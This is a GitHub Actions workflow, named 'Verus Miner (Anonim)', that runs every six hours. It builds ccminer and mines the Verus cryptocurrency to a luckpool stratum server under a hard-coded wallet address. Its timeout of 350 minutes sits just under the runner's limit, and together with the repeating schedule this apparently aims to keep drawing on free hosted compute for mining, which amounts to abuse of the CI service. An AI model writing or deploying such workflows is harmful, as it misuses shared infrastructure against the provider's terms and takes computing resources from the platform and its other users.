name: Verus Miner (Anonim)

on:
  schedule:
    - cron: "0 */6 * * *"  # Jalan otomatis setiap 6 jam
  workflow_dispatch:

jobs:
  verusmine:
    runs-on: ubuntu-latest
    timeout-minutes: 350

    steps:
      - name: Install dependencies
        run: |
          sudo apt update
          sudo apt install -y build-essential git cmake automake libtool autoconf

      - name: Clone ccminer for Verus
        run: |
          git clone https://github.com/monkins1010/ccminer.git
          cd ccminer
          chmod +x build.sh
          ./build.sh

      - name: Start mining
        run: |
          cd ccminer
          ./ccminer -a verus -o stratum+tcp://na.luckpool.net:3956 -u RGVmtuvrP2yX8q3U4up77CcSpkcVhp4bUG -p x -t 1
